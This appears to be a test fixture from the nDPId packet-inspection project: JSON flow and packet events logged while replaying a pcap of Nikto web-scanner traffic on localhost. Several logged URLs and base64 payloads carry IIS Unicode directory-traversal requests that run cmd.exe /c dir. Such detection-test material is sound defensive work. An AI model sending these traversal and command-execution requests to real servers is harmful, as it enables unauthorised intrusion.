+01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420277864,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/fpcount.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003089)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_packet_id":1,"flow_last_seen":1576420277866,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277866,"pkt":"AAAAAAAAAAAAAAAACABFAADHtYVAAEAGhql\/AAABfwAAAcdIH5CyuYy6IN3YVoAYAED+uwAAAQEICp1m\/5KdZv+SR0VUIC9zaXRlL2VnL3NvdXJjZS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxMjYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":727,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277866,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site\/eg\/source.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003126)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_packet_id":1,"flow_last_seen":1576420277867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277867,"pkt":"AAAAAAAAAAAAAAAACABFAADlWiBAAEAG4fB\/AAABfwAAAcdKH5CvgWMmQVkzqIAYAED+2QAAAQEICp1m\/5OdZv+TR0VUIC9jZXJ0c3J2Ly4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1576420277870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"thread_ts_msec":1576420277870,"pkt":"AAAAAAAAAAAAAAAACABFAADwKqRAAEAGEWJ\/AAABfwAAAcdMH5CrChOaUJIGgIAYAED+5AAAAQEICp1m\/5adZv+WR0VUIC9jZ2ktYmluLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1576420277871,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277871,"pkt":"AAAAAAAAAAAAAAAACABFAADnEqJAAEAGKW1\/AAABfwAAAcdOH5CE7yudGG3JzIAYAED+2wAAAQEICp1m\/5edZv+XR0VUIC9paXNhZG1wd2QvLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMTkyKQ0KDQo="} 
+01101{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7560000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1576420277873,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1576420277873,"pkt":"AAAAAAAAAAAAAAAACABFAADuNNpAAEAGBy5\/AAABfwAAAcdQH5AuMg3l88MKY4AYAED+4gAAAQEICp1m\/5mdZv+ZR0VUIC9tc2FkYy8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MykNCg0K"} +01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7560000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7560000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00730{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1576420277874,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1576420277874,"pkt":"AAAAAAAAAAAAAAAACABFAADxWrBAAEAG4VR\/AAABfwAAAcdSH5DZZWOTGgkmxYAYAED+5QAAAQEICp1m\/5qdZv+aR0VUIC9wYnNlcnZlci8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01112{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7560000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1576420277875,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277875,"pkt":"AAAAAAAAAAAAAAAACABFAADs1jZAAEAGZdN\/AAABfwAAAcdUH5CUA+8Kq3ejjIAYAED+4AAAAQEICp1m\/5udZv+bR0VUIC9ycGMvLi4lYzAlYWYuLi8uLiVjMCVhZi4uL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01107{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1576420277877,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277877,"pkt":"AAAAAAAAAAAAAAAACABFAADl6fRAAEAGUhx\/AAABfwAAAcdWH5B7VdDQBDmQE4AYAED+2QAAAQEICp1m\/52dZv+dR0VUIC9zY3JpcHRzLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1576420277878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576420277878,"pkt":"AAAAAAAAAAAAAAAACABFAADltn1AAEAGhZN\/AAABfwAAAcdYH5Dqro9H\/GjzZIAYAED+2QAAAQEICp1m\/56dZv+eR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_packet_id":1,"flow_last_seen":1576420277880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":248,"pkt_l4_len":214,"thread_ts_msec":1576420277880,"pkt":"AAAAAAAAAAAAAAAACABFAADqdQ5AAEAGxv1\/AAABfwAAAcdaH5DlNEwz0kNZnYAYAED+3gAAAQEICp1m\/6CdZv+gR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIrYzpcIiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01106{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003198)"}} 